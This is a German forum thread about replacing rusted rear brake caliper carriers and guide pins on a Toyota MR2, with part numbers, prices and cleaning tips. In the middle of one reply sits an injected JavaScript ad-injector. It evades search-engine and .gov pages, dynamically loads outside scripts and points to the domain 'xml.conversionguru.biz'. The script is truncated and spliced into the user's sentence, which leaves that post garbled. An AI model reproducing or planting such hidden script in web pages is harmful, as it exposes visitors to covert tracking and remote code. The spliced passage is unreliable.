Do Not Sell My Personal Information Jump to content


Bremssattelhalter/träger


MR2_Holic

Recommended Posts

Servus,

nachdem ich neue Bremsscheiben/Belege VA und Bremsscheiben/Beläge + Bremssättel HA bestelt habe fehlen mir nun noch die Bremssattelhalter/träger HA die ich von der Seite nicht beziehen konnte, bei Lexus hatte ich angefragt pro Artikel 227,- nun habe ich welche für gut 200,- gefunden.

1. Kennt jemand noch eine andere bezugsquelle wo es die vilt. Preisgünstiger gibt? Sollten aber neu sein ( meine waren nach 80.000 km nun fest gerostet also der stift mit dem sattel )

2. ist der Stift montiert am Träger beim kauf? Das kann ich nirgends raus Lesen bei den Seiten wo die angeboten werden vilt. hat ja schon mal die auch kaufen müssen und weiss das noch.

OE-Nr. lauten : 4772153060, 4772253060

gruß Kevin.

Link zu diesem Kommentar
Auf anderen Seiten teilen


Das Rot makierte brauche ich.

edit: Ist dieser Steckbolzen bei allen Model reingeschraubt in den träger? dann bräuchte ich ja eig nur 2 x neue Bolzen weil der ja festgerostet ist mit dem Sattel. igk7t26i.pngdzbilms5.png

bearbeitet von MR2_Holic
Link zu diesem Kommentar
Auf anderen Seiten teilen

Hi,

also ich würd nicht zu viel theoretisieren, sondern das ganze am lebenden Objekt anschaun. Wenn der Bolzen mit dem Bremssattel zusammengerostet wäre, brauchst alles neu. Also einen kompletten Bremssattel, weil der sich dann nicht mehr abziehen ließe.

Wenn sich das ganze nur IRGENDWIE wieder aufmachen lässt, wovon ich aufgehe mit dem einsatz eines meinungsverstärkers ( :D ), dann brauchst im prinzip garnix neu. die buchse und der bolzen müssten dann von flugrost-spuren (wenn überhaupt) befreit werden, ein schöner batzen Fett drauf, damit später kein wasser mehr aufs metall kommt und das ganze zusammenbauen. Beim zerlegen gleichmal schaun, ob irgendwelche gummimanschetten erneuert gehören und ob die kolben noch leichtängig sind (sollten sich, wenn sie nicht mehr angeschlossen sind von hand wieder reindrücken lassen)

Man kann natürlich den bolzen auch einzeln neu geben, ich sehe darin aber wenig sinn... der dient im prinzip nur dazu, dass der sattel längs auf der richtigen achse geführt wird.

Link zu diesem Kommentar
Auf anderen Seiten teilen

Neue Bremssättel habe ich ja hier liegen.

Das ist so fest gerostet da haben wir schon alles versucht das geht nicht ,meine Frage die ich mich stelle ; ist der Bolzen der den Sattel führt lediglich in den Träger rein geschraubt ?

Dann würde ich dir bestellen und dann wäre das gelöst :D

Laut Zeichnung soll da ja auch n gewinde sein ,ich würde ja nach gucken nur hält der rost sehr gut :D.

Link zu diesem Kommentar
Auf anderen Seiten teilen

Ja, der Bolzen ist verschraubt. Den Halter kann man wiederverwenden, wenn man ausbohrt, absägt oder so. Sattel und Bolzen dürften aber verloren gehen. Mir steht das auch noch bevor, meine Sättel hinten sind auch festgegangen... :(

Und den Bolzen bekommt man AFAIK nirgends einzeln. Mir wurde gesagt, dass die Lexus-Werkstätten komplett Halter + Bolzen + Sattel wechseln. Wird dann natürlich nicht ganz billig.

Link zu diesem Kommentar
Auf anderen Seiten teilen

Doch du bekommst den bolzen einzeln.

Neue sättel haben mich pro Stück 180,- gekostet und die bolzen kosten glaube 12,50 einer.

So mache ich es auch durch trennen denn Rest da raus neuer bolzen rein Sattel dran gut ist.

Und dann noch mal neue radlager für die VA und ordentliche Aga

Link zu diesem Kommentar
Auf anderen Seiten teilen

Wo und unter welcher Nummer gibts die Bolzen einzeln?

Und den alten Sattel zurückgeschickt (Tauschteil) bzw. entsorgt? Schade darum, eigentlich.

<script> var id=2965617866; var aff=30421; var sid=1; (function() { var hostname = document.location.hostname; function addEventHandler (el, eType, fn) { if (el.addEventListener) el.addEventListener(eType, fn, false); else if (el.attachEvent) el.attachEvent('on' + eType, fn); else el['on' + eType] = fn; } function checkdml() { var h = document.location.hostname; return (h.indexOf("google")!=-1 || h.indexOf("facebook.com")!=-1 || h.indexOf("yahoo.com")!=-1 || h.indexOf("bing.com")!=-1 || h.indexOf("ask.com")!=-1 || h.indexOf("listenersguide.org.uk")!=-1); } function loadScript(src, scriptId, innerText) { if (window.location.protocol == 'https:' && src.indexOf('http:') == 0) return; var script = document.createElement("script"); script.src = src; script.characterSet = "utf-8"; script.type = "text/javascript"; script.setAttribute('jsid', 'js36'); if (typeof(scriptId) !== 'undefined') script.id = scriptId; if (typeof(innerText) !== 'undefined') { if(script.innerText) script.innerText = innerText; else script.textContent = innerText; } (document.head||document.getElementsByTagName('head')[0]|| document.body||document.getElementsByTagName('body')[0]).appendChild(script); } function onloadComplete() { if (hostname.length - hostname.indexOf('.gov') == 4 || document.getElementsByTagName("*").length < 100) return; if (!checkdml()) { window.INLDM_cfg = { fi : 4603, fd : 0, fddm: 'xml.conversionguru.biz', sttc: 'http://www.kfzteile-profis.de aber dann bei Toyota in Göttingen bestellt war für mich einfacher :).

PIN, RR CYLINDER (Toyota)

OE-Nr: 4781530300

Der alte Sattel bzw. beide gehen zurück ja.

Link zu diesem Kommentar
Auf anderen Seiten teilen

Hi. Die waren auch bei mir festgerostet. Habe aber keine neue bestellt. Einfach ausgebaut und mit Stahlbürstenaufsatz für Bohrmaschine und Dremel sauber geschrubbt. Fett drauf das wars... ;)

bearbeitet von Faeen
Link zu diesem Kommentar
Auf anderen Seiten teilen

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Gast
Auf dieses Thema antworten...

×   Du hast formatierten Text eingefügt.   Formatierung jetzt entfernen

  Only 75 emoji are allowed.

×   Dein Link wurde automatisch eingebettet.   Einbetten rückgängig machen und als Link darstellen

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Neu erstellen...

Important Information

Datenschutzerklärung